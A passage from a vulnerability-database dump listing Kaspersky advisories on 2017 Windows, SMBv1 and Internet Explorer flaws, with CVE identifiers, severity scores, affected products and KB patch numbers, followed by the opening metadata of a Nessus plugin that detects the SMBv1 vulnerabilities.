\n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0212>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0259>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) \n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) 
\n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *CVE-IDS*:\n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning \n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning \n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High 
\n[CVE-2017-0259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0259>)1.9Warning \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0212>)5.4High \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning \n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4016871](<http://support.microsoft.com/kb/4016871>) \n[4019474](<http://support.microsoft.com/kb/4019474>) \n[4019215](<http://support.microsoft.com/kb/4019215>) \n[4019216](<http://support.microsoft.com/kb/4019216>) \n[4019473](<http://support.microsoft.com/kb/4019473>) \n[4019472](<http://support.microsoft.com/kb/4019472>) \n[4019213](<http://support.microsoft.com/kb/4019213>) \n[4019214](<http://support.microsoft.com/kb/4019214>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11009 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2020-09-29T00:00:00", "id": "KLA11009", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11009/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T15:06:09", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, cause denial of service, bypass security restrictions, gain privileges.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) 
\n[CVE-2017-0222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0222>) \n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0064](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0064>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0238>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) 
\n[CVE-2017-0175](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0175>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0244>) \n[CVE-2017-0242](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0242>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0238>)7.6Critical \n[CVE-2017-0222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0222>)7.6Critical \n[CVE-2017-0064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0064>)4.3Warning \n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning 
\n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning \n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0244>)6.9High \n[CVE-2017-0242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0242>)4.3Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0175](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0175>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning 
\n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4018271](<http://support.microsoft.com/kb/4018271>) \n[4019264](<http://support.microsoft.com/kb/4019264>) \n[4019263](<http://support.microsoft.com/kb/4019263>) \n[4019149](<http://support.microsoft.com/kb/4019149>) \n[4018885](<http://support.microsoft.com/kb/4018885>) \n[4019206](<http://support.microsoft.com/kb/4019206>) \n[4018821](<http://support.microsoft.com/kb/4018821>) \n[4018927](<http://support.microsoft.com/kb/4018927>) \n[4018556](<http://support.microsoft.com/kb/4018556>) \n[4019204](<http://support.microsoft.com/kb/4019204>) \n[4018466](<http://support.microsoft.com/kb/4018466>) \n[4018196](<http://support.microsoft.com/kb/4018196>)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11077 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", 
"CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0238", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-01-18T00:00:00", "id": "KLA11077", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11077/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:17:32", "description": "### *Detect date*:\n06/05/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn improper handling of objects in memory in Windows kernel-mode driver was found in Microsoft Windows. By exploiting this vulnerability malicious users can gain privileges. This vulnerability can be exploited remotely via a specially designed application by a malicious user who has logged on to the system.\n\n### *Affected products*:\nWindows 7 Service Pack 1 \nWindows Server 2008 Service Pack 2 \nWindows Server 2008 R2 Service Pack 1 \n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8552](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8552>) \n[CVE-2017-8552](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8552>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows 7](<https://threats.kaspersky.com/en/product/Microsoft-Windows-7/>)\n\n### *CVE-IDS*:\n[CVE-2017-8552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8552>)7.2High\n\n### *Microsoft official advisories*:\n\n\n### *KB 
list*:\n[4019264](<http://support.microsoft.com/kb/4019264>) \n[4019263](<http://support.microsoft.com/kb/4019263>) \n[4019204](<http://support.microsoft.com/kb/4019204>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-05T00:00:00", "type": "kaspersky", "title": "KLA11040 Elevation of privilege vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8552"], "modified": "2020-06-03T00:00:00", "id": "KLA11040", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11040/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:36:35", "description": "The remote Windows host has Microsoft Server Message Block 1.0 (SMBv1) enabled. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of SMBv1 packets. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted SMBv1 packet, to disclose sensitive information. 
(CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted SMB request, to cause the system to stop responding. (CVE-2017-0269, CVE-2017-0273, CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of SMBv1 packets. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted SMBv1 packet, to execute arbitrary code. (CVE-2017-0272, CVE-2017-0277, CVE-2017-0278, CVE-2017-0279)\n\nDepending on the host's security policy configuration, this plugin cannot always correctly determine if the Windows host is vulnerable if the host is running a later Windows version (i.e., Windows 8.1, 10, 2012, 2012 R2, and 2016) specifically that named pipes and shares are allowed to be accessed remotely and anonymously. 
Tenable does not recommend this configuration, and the hosts should be checked locally for patches with one of the following plugins, depending on the Windows version : 100054, 100055, 100057, 100059, 100060, or 100061.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MS17_MAY_SMBV1.NASL", "href": "https://www.tenable.com/plugins/nessus/100464", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100464);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSKB\", value:\"4019472\");\n 
script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSKB\", value:\"4019474\");\n\n script_name(english:\"Microsoft Windows SMBv1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the response from the SMBv1 server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has Microsoft Server Message Block 1.0 (SMBv1)\nenabled. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist\n in Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of SMBv1 packets. An unauthenticated,\n remote attacker can exploit these vulnerabilities, via a\n specially crafted SMBv1 packet, to disclose sensitive\n information. (CVE-2017-0267, CVE-2017-0268,\n CVE-2017-0270, CVE-2017-0271, CVE-2017-0274,\n CVE-2017-0275, CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of requests. An unauthenticated,\n remote attacker can exploit these vulnerabilities, via a\n specially crafted SMB request, to cause the system to\n stop responding. (CVE-2017-0269, CVE-2017-0273,\n CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of SMBv1 packets. An unauthenticated,\n remote attacker can exploit these vulnerabilities, via a\n specially crafted SMBv1 packet, to execute arbitrary\n code. 
(CVE-2017-0272, CVE-2017-0277, CVE-2017-0278,\n CVE-2017-0279)\n\nDepending on the host's security policy configuration, this plugin\ncannot always correctly determine if the Windows host is vulnerable if\nthe host is running a later Windows version (i.e., Windows 8.1, 10,\n2012, 2012 R2, and 2016) specifically that named pipes and shares are\nallowed to be accessed remotely and anonymously. Tenable does not\nrecommend this configuration, and the hosts should be checked locally\nfor patches with one of the following plugins, depending on the\nWindows version : 100054, 100055, 100057, 100059, 100060, or 100061.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0267\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c21268d4\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0268\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9253982\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0269\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23802c83\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0270\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8313bb60\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7677c678\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0272\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?36da236c\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0273\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0981b934\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0274\n script_set_attribute(attribute:\"see_also\", 
